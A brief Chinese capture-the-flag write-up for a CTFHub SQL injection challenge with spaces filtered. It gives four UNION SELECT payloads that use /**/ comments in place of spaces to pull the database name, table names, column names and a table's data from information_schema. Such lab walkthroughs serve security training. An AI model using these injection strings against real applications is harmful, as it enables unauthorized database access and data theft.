CTFHUB-SQL注入-过滤空格

燕雀安知鸿鹄之志哉.2024-08-15 10:09

查询数据库名

查询数据库中的表

查询表中字段

查询表中数据

空格被过滤，使用 /**/ 绕过

查询数据库名

复制代码

-1/**/union/**/select/**/1,database()

查询数据库中的表

复制代码

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查询表中字段

复制代码

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'

查询表中数据

复制代码

-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg